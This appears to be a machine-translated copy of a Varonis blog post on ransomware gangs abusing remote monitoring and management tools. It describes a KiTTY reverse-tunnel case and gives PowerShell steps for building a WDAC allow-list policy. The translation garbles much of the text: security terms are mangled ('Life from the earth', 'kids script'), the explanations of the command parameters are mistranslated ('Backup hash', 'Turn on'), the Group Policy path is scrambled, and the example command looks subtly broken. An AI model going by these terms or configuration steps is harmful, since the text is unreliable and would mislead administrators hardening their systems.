As more people work remotely, IT departments must manage devices spread across cities and countries, relying on VPNs and remote monitoring and management (RMM) tools for system administration.
However, like any new technology, RMM tools can also be used maliciously. Threat actors can connect to a victim’s device and run commands, steal data, and remain undetected.
This article will look at real-world examples of RMM exploits and show you how to protect your organization against these attacks.
What are RMM tools?
RMM software simplifies network management by allowing IT professionals to remotely troubleshoot problems, install software, and upload or download files to or from devices.
Unfortunately, this connection is not always secure, and attackers can use malware to connect their servers to the victim’s device. However, if these connections are easier to detect, ransomware as a service (RaaS) the groups had to adjust their methods.
In most of the cyber incidents Voronis investigated last year, RaaS gangs used a method known as Life from the earthusing legitimate IT tools to gain remote control, undetected network navigation and data theft.
RMM tools allow attackers to blend in and evade detection. They and their traffic are typically “ignored” by an organization’s security controls and security policies, such as application whitelisting.
This tactic also helps kids script — once they plug in, they’ll find everything they need already installed and ready for them.
Our research revealed two main methods that attackers use to manipulate RMM tools:
- Abuse of existing RMM tools: Attackers gain initial access to an organization’s network using pre-existing RMM tools. They use weak or default credentials or tool vulnerabilities to gain access without triggering detection.
- Installing new RMM tools: Attackers install their preferred RMM tools by first gaining access to the network. They use phishing emails or social engineering techniques to get victims to unwittingly install the RMM tool on their network.
The following are common RMM tools and RaaS groups:
Common RMM tools and RaaS groups |
Real-life examples of RMM exploits
During a recent investigation, our Managed Data Discovery and Response (MDDR) the team analyzed the organization’s data and found evidence of an RMM tool called “KiTTY” in the history of the hacked PowerShell device.
This software was a modified version of PuTTY, a well-known tool for creating Telnet and SSH sessions with remote machines. Since PuTTY is a legitimate RMM tool, none of the organization’s security software detected the signals, so KiTTY was able to create reverse tunnels over port 443 to expose the internal servers to the AWS EC2 box.
The Varonis team conducted a comprehensive analysis. They found that sessions to an AWS EC2 box using KiTTY were key to discovering what happened, how it was done, and — most importantly — what files were stolen.
This important evidence became a turning point in the investigation and helped trace the entire chain of attacks. He also showed gaps in the organization’s security, ways to eliminate them and the possible consequences of this attack.
Strategies to protect RMM tools
Consider implementing the following strategies to reduce the likelihood of attackers abusing RMM tools.
Application Control Policy
Prevent your organization from using multiple RMM tools by introducing an application control policy:
- Ensure that RMM tools are updated, patched, and accessible only to authorized users with MFA enabled
- Proactively block incoming and outgoing connections on restricted ports and RMM protocols at the network perimeter
One option is to create a Windows Defender Application Control (WDAC) policy using PowerShell that whitelists applications based on their publisher. It is important to note that creating WDAC policies requires administrative privileges, and deploying them via Group Policy requires domain administrative privileges.
As a precaution, you should test the policy in audit mode before deploying it in force mode to avoid inadvertently blocking essential programs.
- Open PowerShell with administrator rights
- Create a new policy: You can create a new policy using New-CIPolicy commandlet. This cmdlet takes a directory or file path, scans it, and makes a policy that allows all files in that path, such as executables and DLL files, to run on your network.
For example, if you want to allow everything signed by the publisher of a particular app, you can follow this example:
New-CIPolicy -FilePath “C:\Path\To\Application.exe” -Level Publisher -UserPEs -Fallback Hash -Enable -OutputFilePath “C:\Path\To\Policy.xml”In this team, -Path to the file specifies the path to the application, -Level Publisher means that the policy will allow anything signed by the same publisher as the application and -UserPEs means that the policy will include user mode executables.
-Backup hash means that if the file is not signed, the policy will allow it based on its hash,– Turn on means that the policy will be included, and -OutputFilePath specifies the path where the policy will be saved.
- Convert the policy to binary format: WDAC policies must be deployed in binary format. You can convert the policy using ConvertFrom-CIPolicy cmdlet: ConvertFrom-CIPolicy -XmlFilePath “C:\Path\To\Policy.xml” -BinaryFilePath “C:\Path\To\Policy.bin”
- Deploy the policy: You can deploy policies using the Group Policy Management Console (GPMC). To do this, you must copy the .bin file to the \\Windows\System32\CodeIntegrity directory on each computer where you want to deploy the policy. Then you need to install Computer Configuration → Administrative Templates → System Device Guard → Expand Windows Defender Application Control policy setting is enabled and set Use Windows Defender Application Control to help protect your device, the Enforce option.
Constant monitoring
Monitor network traffic and logs, especially for RMM tools. Consider implementing services such as Hero of the MDDRwhich provides 24x7x365 network monitoring and behavioral analysis.
User training and awareness
Train your employees to detect phishing attempts and effective password management, as user manipulation is a common way attackers gain access to your network. Encourage reporting of suspicious activity and regularly review your cybersecurity team for potential risks.
Reduce your risk by not taking any.
As technology advances, it gives both defenders and attackers an advantage, and RMM tools are just one example of the potential threats organizations face.
At Varonis, our mission is to protect what matters most: your data. Our all in one Data security platform continuously discovers and categorizes critical data, mitigates exposure, and stops threats in real-time with AI-powered automation.
Curious to know what risks may be prevalent in your environment? Get Varonis Data risk assessment today.
Our free assessment only takes a few minutes to set up and provides immediate benefits. In less than 24 hours, you’ll have a clear, risk-based view of your most critical data and a clear path to automated remediation.
Note: This article originally appeared on Varonis Blog.